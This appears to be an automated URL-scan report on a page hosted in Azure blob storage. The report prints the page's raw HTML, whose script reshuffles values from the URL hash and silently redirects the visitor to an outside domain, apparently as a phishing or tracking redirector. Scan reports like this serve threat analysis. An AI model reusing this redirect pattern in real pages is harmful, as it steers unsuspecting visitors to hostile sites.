https://astrostudentsapproval.blob.core.windows.net/astrostudentsapproval/1.html

Submitted URL:
https://astrostudentsapproval.blob.core.windows.net/astrostudentsapproval/1.html
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 7 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

Console log messages · 1 found

Messages logged to the web console

HTML

The raw HTML body of the page

<!-- saved from url=(0014)about:internet --><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta http-equiv="refresh" content="3; url=">
<script>
// Initial URL

var initialURL = window.location.href;

// Extracting the hash part of the URL
var hashPart = initialURL.split('#')[1];

// Extracting values from the hash part
var hashValues = hashPart.split('/');

// Rearranging the values for the new URL format
var newURL = 'https://whispersort.com/0/0/0/10cc7027f74fd4701d65642da332cc4b/' + hashValues[2] + '/' + hashValues[1].split('_')[0] + '_2/' + hashValues[5] + '_' + hashValues[6] + '_' + hashValues[3] + '_' + hashValues[4] + '_md' ;

document.location.href = newURL;
</script></head><body></body></html>